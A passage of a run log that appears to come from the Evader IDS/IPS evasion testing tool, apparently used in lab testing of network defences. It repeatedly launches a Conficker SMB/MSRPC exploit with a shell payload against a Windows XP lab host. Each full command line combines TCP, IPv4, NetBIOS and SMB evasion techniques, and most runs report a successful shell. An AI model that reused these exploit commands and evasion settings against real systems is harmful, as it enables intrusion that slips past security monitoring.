  1603. Info: Sending MSRPC request with exploit
  1604. Info: Shell found, attack succeeded
  1605. Info: CommandShell::SendCommand() - Failed to send string
  1606. Info: Command shell connection reset.
  1607. Info: Shell closed
  1608. 0: Success.
  1609.  
  1610. 2873 runs averaging 2.08 runs / second ; progress: 1384/43200............2015-06-07 23:42:38 INFO
  1611. Success. (10.62.90.116):
  1612. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54781 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=O41JLQdTNUg --evasion=[netbios_connect,smb_connect]netbios_chaff,"13","empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_paws,"5","264106485","random_alpha" --verifydelay=1000 --payload=shell
  1613. Info: Using random seed O41JLQdTNUg
  1614. The following evasions are applied from stage netbios_connect to smb_connect:
  1615. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1616. The following evasions are applied from stage smb_opentree to end:
  1617. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 264106485> and has random alpha bytes as payload
  1618.  
  1619. Info: NetBIOS connection 10.62.90.116:54781 -> 10.35.1.207:445
  1620. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1621. Info: Sending MSRPC request with exploit
  1622. Info: Shell found, attack succeeded
  1623. Info: Shell closed
  1624. 0: Success.
  1625. ..
  1626. 2888 runs averaging 2.08 runs / second ; progress: 1389/43200.........
  1627. 2897 runs averaging 2.08 runs / second ; progress: 1394/43200.....
  1628. 2902 runs averaging 2.07 runs / second ; progress: 1399/432002015-06-07 23:42:49 INFO
  1629. Success. (10.62.90.114):
  1630. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56654 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wpR2aE+gKxE --evasion=[smb_connect,end]smb_decoytrees,"6","1","8","random_msrpcreq" --evasion=[netbios_connect,smb_opentree]tcp_urgent,"3","zero" --verifydelay=1000 --payload=shell
  1631. Info: Using random seed wpR2aE+gKxH
  1632. The following evasions are applied from stage netbios_connect to smb_opentree:
  1633. - Add a zero urgent data byte to every 3 TCP segment.
  1634. The following evasions are applied from stage smb_connect to end:
  1635. - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  1636.  
  1637. Info: NetBIOS connection 10.62.90.114:56654 -> 10.35.1.207:445
  1638. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1639. Info: Sending MSRPC request with exploit
  1640. Info: Shell found, attack succeeded
  1641. Info: CommandShell::SendCommand() - Failed to send string
  1642. Info: Command shell connection reset.
  1643. Info: Shell closed
  1644. 0: Success.
  1645. .......
  1646. 2910 runs averaging 2.07 runs / second ; progress: 1404/43200..........
  1647. 2920 runs averaging 2.07 runs / second ; progress: 1409/43200.....
  1648. 2925 runs averaging 2.07 runs / second ; progress: 1414/432002015-06-07 23:43:04 INFO
  1649. Success. (10.62.90.111):
  1650. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37265 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=B3brkhsbOQY --evasion=[start,smb_connect]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[start,end]tcp_paws,"50%","161438852","shuffle" --verifydelay=1000 --payload=shell
  1651. Info: Using random seed B3brkhsbOQY
  1652. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161438852> and has shuffled original payload
  1653. The following evasions are applied from stage start to smb_connect:
  1654. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1655. The duplicate packet has identical payload except that alphanumeric characters are randomized
  1656.  
  1657. Info: NetBIOS connection 10.62.90.111:37265 -> 10.35.1.207:445
  1658. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1659. Info: Sending MSRPC request with exploit
  1660. Info: Shell found, attack succeeded
  1661. Info: Shell closed
  1662. 0: Success.
  1663. ........
  1664. 2934 runs averaging 2.07 runs / second ; progress: 1419/43200.....
  1665. 2939 runs averaging 2.06 runs / second ; progress: 1424/43200....
  1666. 2943 runs averaging 2.06 runs / second ; progress: 1429/43200...
  1667. 2946 runs averaging 2.05 runs / second ; progress: 1434/43200......
  1668. 2952 runs averaging 2.05 runs / second ; progress: 1439/43200.....
  1669. 2957 runs averaging 2.05 runs / second ; progress: 1444/43200.....
  1670. 2962 runs averaging 2.04 runs / second ; progress: 1449/43200..
  1671. 2964 runs averaging 2.04 runs / second ; progress: 1454/43200
  1672. 2964 runs averaging 2.03 runs / second ; progress: 1459/43200
  1673. 2964 runs averaging 2.02 runs / second ; progress: 1464/43200...Pid 16867 timed out - killed
  1674. 2015-06-07 23:43:56 INFO
  1675. Timed out (10.62.90.115):
  1676. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32831 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fbiRe0OqRqE --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1480","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  1677. Info: Using random seed fbiRe0OqRqF
  1678. The following evasions are applied from stage netbios_connect to msrpc_bind:
  1679. - TCP segments are set to overlap by 1480 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  1680. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1681. - 75% probability to add a random urgent data byte to a TCP segment.
  1682. The following evasions are applied from stage smb_openpipe to end:
  1683. - The SMB filename is obfuscated:
  1684. * Random characters case is changed
  1685. * Dummy paths are added ( a/b -> a/c/../b )
  1686. * A 0x00 and random alphanumeric characters are appended to the filename
  1687.  
  1688. Info: NetBIOS connection 10.62.90.115:32831 -> 10.35.1.207:445
  1689. Terminated
  1690. ...Pid 16964 timed out - killed
  1691. 2015-06-07 23:43:58 INFO
  1692. Timed out (10.62.90.113):
  1693. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55313 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b5STQXcaaZU --evasion=[start,smb_opentree]ipv4_opt,"2","inc","random_alphanum" --evasion=[smb_connect,msrpc_bind]netbios_chaff,"8","empty_unspec|http_post|msrpc_req" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
  1694. Info: Using random seed b5STQXcaaZV
  1695. The following evasions are applied from stage start to smb_opentree:
  1696. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1697. The duplicate packet has random alphanumeric bytes as payload
  1698. The following evasions are applied from stage smb_connect to msrpc_bind:
  1699. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  1700. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1701. - 50% probability to add a zero urgent data byte to a TCP segment.
  1702.  
  1703. Info: NetBIOS connection 10.62.90.113:55313 -> 10.35.1.207:445
  1704. Terminated
  1705. ....
  1706. 2976 runs averaging 2.03 runs / second ; progress: 1469/43200........
  1707. 2984 runs averaging 2.02 runs / second ; progress: 1474/43200......
  1708. 2990 runs averaging 2.02 runs / second ; progress: 1479/43200
  1709. 2990 runs averaging 2.01 runs / second ; progress: 1484/43200.....2015-06-07 23:44:17 INFO
  1710. Success. (10.62.90.115):
  1711. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61219 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=st6VvQtY2WU --evasion=[netbios_connect,end]netbios_chaff,"50%","small_unspec" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","183712702","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
  1712. Info: Using random seed st6VvQtY2WW
  1713. The following evasions are applied from stage netbios_connect to end:
  1714. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type.
  1715. The following evasions are applied from stage smb_connect to msrpc_req:
  1716. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 183712702> and has original payload with alphanumeric bytes randomized
  1717. The following evasions are applied from stage smb_connect to msrpc_bind:
  1718. - Add a random alphaurgent data byte to every 13 TCP segment.
  1719.  
  1720. Info: NetBIOS connection 10.62.90.115:61219 -> 10.35.1.207:445
  1721. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1722. Info: Sending MSRPC request with exploit
  1723. Info: Shell found, attack succeeded
  1724. Info: CommandShell::SendCommand() - Failed to send string
  1725. Info: Command shell connection reset.
  1726. Info: Shell closed
  1727. 0: Success.
  1728. ....
  1729. 3000 runs averaging 2.01 runs / second ; progress: 1489/43200..
  1730. 3002 runs averaging 2.01 runs / second ; progress: 1494/43200.....
  1731. 3007 runs averaging 2.01 runs / second ; progress: 1499/43200.....
  1732. 3012 runs averaging 2.00 runs / second ; progress: 1504/43200..........
  1733. 3022 runs averaging 2.00 runs / second ; progress: 1509/43200....
  1734. 3026 runs averaging 2.00 runs / second ; progress: 1514/43200Pid 17706 timed out - killed
  1735. 2015-06-07 23:44:48 INFO
  1736. Timed out (10.62.90.112):
  1737. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50332 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=baHVccOAqg0 --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"2","empty_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
  1738. Info: Using random seed baHVccOAqg1
  1739. The following evasions are applied from stage smb_openpipe to end:
  1740. - Add a zero urgent data byte to every 1 TCP segment.
  1741. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  1742. - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  1743.  
  1744. Info: NetBIOS connection 10.62.90.112:50332 -> 10.35.1.207:445
  1745. Terminated
  1746. .
  1747. 3028 runs averaging 1.99 runs / second ; progress: 1519/43200.......
  1748. 3035 runs averaging 1.99 runs / second ; progress: 1524/43200.......2015-06-07 23:44:57 INFO
  1749. Success. (10.62.90.112):
  1750. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20874 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bDJ7YWEAIoE --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"2","inc","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
  1751. Info: Using random seed bDJ7YWEAIoF
  1752. The following evasions are applied from stage netbios_connect to msrpc_req:
  1753. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
  1754. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1755. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1756. The duplicate packet has random alphabetic bytes as payload
  1757.  
  1758. Info: NetBIOS connection 10.62.90.112:20874 -> 10.35.1.207:445
  1759. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1760. Info: Sending MSRPC request with exploit
  1761. Info: Shell found, attack succeeded
  1762. Info: Command shell connection reset.
  1763. Info: CommandShell::SendCommand() - Failed to send string
  1764. Info: Shell closed
  1765. 0: Success.
  1766. ....
  1767. 3047 runs averaging 1.99 runs / second ; progress: 1529/43200.........
  1768. 3056 runs averaging 1.99 runs / second ; progress: 1534/43200......
  1769. 3062 runs averaging 1.99 runs / second ; progress: 1539/43200....
  1770. 3066 runs averaging 1.99 runs / second ; progress: 1544/43200..Pid 18133 timed out - killed
  1771. 2015-06-07 23:45:15 INFO
  1772. Timed out (10.62.90.117):
  1773. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=gZv/c+PGmls --evasion=[msrpc_bind,end]smb_decoytrees,"2","6","900","random" --evasion=[netbios_connect,end]tcp_paws,"8","5","alpharandomized" --verifydelay=1000 --payload=shell
  1774. Info: Using random seed gZv/c+PGmlu
  1775. The following evasions are applied from stage netbios_connect to end:
  1776. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
  1777. The following evasions are applied from stage msrpc_bind to end:
  1778. - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 900 random bytes.
  1779.  
  1780. Info: NetBIOS connection 10.62.90.117:55741 -> 10.35.1.207:445
  1781. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1782. Info: Sending MSRPC request with exploit
  1783. Terminated
  1784. .......2015-06-07 23:45:19 INFO
  1785. Success. (10.62.90.115):
  1786. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18357 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=HyiGiu1DZEU --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","1","6","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
  1787. Info: Using random seed HyiGiu1DZEU
  1788. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1789. - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 6 bytes of MSRPC bind-like data.
  1790. - SMB writes are segmented to contain at most 7 bytes of payload.
  1791.  
  1792. Info: NetBIOS connection 10.62.90.115:18357 -> 10.35.1.207:445
  1793. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1794. Info: Sending MSRPC request with exploit
  1795. Info: Shell found, attack succeeded
  1796. Info: Command shell connection reset.
  1797. Info: CommandShell::SendCommand() - Failed to send string
  1798. Info: Shell closed
  1799. 0: Success.
  1800. .
  1801. 3078 runs averaging 1.99 runs / second ; progress: 1549/43200.
  1802. 3079 runs averaging 1.98 runs / second ; progress: 1554/43200....
  1803. 3083 runs averaging 1.98 runs / second ; progress: 1559/43200..........
  1804. 3093 runs averaging 1.98 runs / second ; progress: 1564/43200......2015-06-07 23:45:39 INFO
  1805. Success. (10.62.90.115):
  1806. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41890 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=pFzCeVGUS4A --evasion=[start,netbios_connect]ipv4_frag,"1128" --evasion=[msrpc_bind,end]smb_decoytrees,"3","3","7","random_msrpcbind" --evasion=[smb_connect,end]tcp_overlap,"5","new","zero" --verifydelay=1000 --payload=shell
  1807. Info: Using random seed pFzCeVGUS4C
  1808. The following evasions are applied from stage start to netbios_connect:
  1809. - IPv4 fragments with at most 1128 bytes per fragment
  1810. The following evasions are applied from stage smb_connect to end:
  1811. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  1812. The following evasions are applied from stage msrpc_bind to end:
  1813. - Before normal SMB writes, 3 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  1814.  
  1815. Info: NetBIOS connection 10.62.90.115:41890 -> 10.35.1.207:445
  1816. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1817. Info: Sending MSRPC request with exploit
  1818. Info: Shell found, attack succeeded
  1819. Info: Shell closed
  1820. 0: Success.
  1821.  
  1822. 3100 runs averaging 1.98 runs / second ; progress: 1569/43200
  1823. 3100 runs averaging 1.97 runs / second ; progress: 1574/43200..
  1824. 3102 runs averaging 1.96 runs / second ; progress: 1579/43200.........
  1825. 3111 runs averaging 1.96 runs / second ; progress: 1584/43200........
  1826. 3119 runs averaging 1.96 runs / second ; progress: 1589/43200.......
  1827. 3126 runs averaging 1.96 runs / second ; progress: 1594/43200.......
  1828. 3133 runs averaging 1.96 runs / second ; progress: 1599/43200.....
  1829. 3138 runs averaging 1.96 runs / second ; progress: 1604/43200.....
  1830. 3143 runs averaging 1.95 runs / second ; progress: 1609/43200..........
  1831. 3153 runs averaging 1.95 runs / second ; progress: 1614/43200..2015-06-07 23:46:25 INFO
  1832. Success. (10.62.90.113):
  1833. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57851 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=AP1hGMDxKw4 --evasion=[netbios_connect,msrpc_req]ipv4_opt,"5","inc","shuffletcp" --evasion=[netbios_connect,end]tcp_paws,"3","137668711","random_alphanum" --verifydelay=1000 --payload=shell
  1834. Info: Using random seed AP1hGMDxKw4
  1835. The following evasions are applied from stage netbios_connect to msrpc_req:
  1836. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1837. The duplicate packet has shuffled TCP payload
  1838. The following evasions are applied from stage netbios_connect to end:
  1839. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137668711> and has random alphanumeric bytes as payload
  1840.  
  1841. Info: NetBIOS connection 10.62.90.113:57851 -> 10.35.1.207:445
  1842. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1843. Info: Sending MSRPC request with exploit
  1844. Info: Shell found, attack succeeded
  1845. Info: Shell closed
  1846. 0: Success.
  1847. .....Pid 19636 timed out - killed
  1848. 2015-06-07 23:46:28 INFO
  1849. Timed out (10.62.90.110):
  1850. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50808 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Jkvm51PzYao --evasion=[smb_opentree,end]ipv4_frag,"1480" --evasion=[netbios_connect,end]ipv4_opt,"13","inc","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  1851. Info: Using random seed Jkvm51PzYao
  1852. The following evasions are applied from stage netbios_connect to end:
  1853. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1854. The duplicate packet has NULL bytes for payload
  1855. The following evasions are applied from stage smb_opentree to end:
  1856. - IPv4 fragments with at most 1480 bytes per fragment
  1857. The following evasions are applied from stage smb_openpipe to end:
  1858. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  1859.  
  1860. Info: NetBIOS connection 10.62.90.110:50808 -> 10.35.1.207:445
  1861. Terminated
  1862. ..........
  1863. 3172 runs averaging 1.96 runs / second ; progress: 1619/43200...............
  1864. 3187 runs averaging 1.96 runs / second ; progress: 1625/43200...............
  1865. 3202 runs averaging 1.96 runs / second ; progress: 1630/432002015-06-07 23:46:40 INFO
  1866. Success. (10.62.90.115):
  1867. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42667 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=GOpIKjE2r4Y --evasion=[msrpc_bind,end]smb_decoytrees,"3","6","7","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_segvar,"4","65535" --verifydelay=1000 --payload=shell
  1868. Info: Using random seed GOpIKjE2r4Y
  1869. The following evasions are applied from stage msrpc_bind to end:
  1870. - TCP packets are segmented to contain between 4 and 65535 bytes of payload.
  1871. - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  1872.  
  1873. Info: NetBIOS connection 10.62.90.115:42667 -> 10.35.1.207:445
  1874. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1875. Info: Sending MSRPC request with exploit
  1876. Info: Shell found, attack succeeded
  1877. Info: Shell closed
  1878. 0: Success.
  1879. .........
  1880. 3212 runs averaging 1.96 runs / second ; progress: 1635/43200........
  1881. 3220 runs averaging 1.96 runs / second ; progress: 1640/43200.............
  1882. 3233 runs averaging 1.97 runs / second ; progress: 1645/43200............2015-06-07 23:46:59 INFO
  1883. Success. (10.62.90.115):
  1884. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30995 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=eLhPcn+y9o4 --evasion=[start,end]tcp_paws,"21","122513006","shuffle30" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
  1885. Info: Using random seed eLhPcn+y9o5
  1886. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122513006> and has 30 bytes of original payload, then shuffled original payload
  1887. The following evasions are applied from stage smb_opentree to msrpc_req:
  1888. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
  1889.  
  1890. Info: NetBIOS connection 10.62.90.115:30995 -> 10.35.1.207:445
  1891. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1892. Info: Sending MSRPC request with exploit
  1893. Info: Shell found, attack succeeded
  1894. Info: Shell closed
  1895. 0: Success.
  1896. ..
  1897. 3248 runs averaging 1.97 runs / second ; progress: 1650/43200..............
  1898. 3262 runs averaging 1.97 runs / second ; progress: 1655/43200..............
  1899. 3276 runs averaging 1.97 runs / second ; progress: 1660/43200...........
  1900. 3287 runs averaging 1.97 runs / second ; progress: 1665/43200.......
  1901. 3294 runs averaging 1.97 runs / second ; progress: 1670/43200...
  1902. 3297 runs averaging 1.97 runs / second ; progress: 1675/43200.......
  1903. 3304 runs averaging 1.97 runs / second ; progress: 1680/43200........
  1904. 3312 runs averaging 1.97 runs / second ; progress: 1685/43200.....Pid 21182 timed out - killed
  1905. 2015-06-07 23:47:38 INFO
  1906. Timed out (10.62.90.118):
  1907. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18119 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=nYRQiekFQ6c --evasion=[msrpc_bind,end]ipv4_opt,"75%","inc","zero" --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|small_unspec|http_get|http_post|msrpc_req" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  1908. Info: Using random seed nYRQiekFQ6e
  1909. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1910. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  1911. The following evasions are applied from stage smb_openpipe to end:
  1912. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  1913. The following evasions are applied from stage msrpc_bind to end:
  1914. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  1915. The duplicate packet has NULL bytes for payload
  1916.  
  1917. Info: NetBIOS connection 10.62.90.118:18119 -> 10.35.1.207:445
  1918. Terminated
  1919. ..
  1920. 3320 runs averaging 1.96 runs / second ; progress: 1690/43200Pid 21258 timed out - killed
  1921. 2015-06-07 23:47:40 INFO
  1922. Timed out (10.62.90.116):
  1923. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44993 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=117gBcdU3HQ --evasion=[msrpc_bind,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  1924. Info: Using random seed 117gBcdU3HT
  1925. The following evasions are applied from stage smb_connect to msrpc_bind:
  1926. - 75% probability to add a random urgent data byte to a TCP segment.
  1927. The following evasions are applied from stage msrpc_bind to end:
  1928. - The SMB filename is obfuscated:
  1929. * Dummy paths are added ( a/b -> a/c/../b )
  1930. * A 0x00 and random alphanumeric characters are appended to the filename
  1931.  
  1932. Info: NetBIOS connection 10.62.90.116:44993 -> 10.35.1.207:445
  1933. Terminated
  1934. .......2015-06-07 23:47:44 INFO
  1935. Success. (10.62.90.115):
  1936. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39878 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=EQRt84k6lTQ --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"2","1","10","random_msrpcreq" --evasion=[smb_connect,end]smb_decoytrees,"2","2","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  1937. Info: Using random seed EQRt84k6lTQ
  1938. The following evasions are applied from stage smb_connect to msrpc_bind:
  1939. - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 10 bytes of MSRPC request-like data.
  1940. The following evasions are applied from stage smb_connect to end:
  1941. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  1942.  
  1943. Info: NetBIOS connection 10.62.90.115:39878 -> 10.35.1.207:445
  1944. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1945. Info: Sending MSRPC request with exploit
  1946. Info: Shell found, attack succeeded
  1947. Info: Shell closed
  1948. 0: Success.
  1949. .
  1950. 3330 runs averaging 1.96 runs / second ; progress: 1695/43200.........
  1951. 3339 runs averaging 1.96 runs / second ; progress: 1700/43200..........
  1952. 3349 runs averaging 1.96 runs / second ; progress: 1705/43200..........
  1953. 3359 runs averaging 1.96 runs / second ; progress: 1710/43200Pid 21568 timed out - killed
  1954. 2015-06-07 23:48:00 INFO
  1955. Timed out (10.62.90.119):
  1956. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35574 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b1eDRHpOWxU --evasion=[smb_opentree,msrpc_req]smb_chaff,"25%","write_flag","zero" --evasion=[start,msrpc_req]tcp_paws,"75%","3","random_alpha" --verifydelay=1000 --payload=shell
  1957. Info: Using random seed b1eDRHpOWxV
  1958. The following evasions are applied from stage start to msrpc_req:
  1959. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  1960. The following evasions are applied from stage smb_opentree to msrpc_req:
  1961. - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  1962.  
  1963. Info: NetBIOS connection 10.62.90.119:35574 -> 10.35.1.207:445
  1964. Terminated
  1965. ......
  1966. 3366 runs averaging 1.96 runs / second ; progress: 1715/43200.2015-06-07 23:48:06 INFO
  1967. Success. (10.62.90.119):
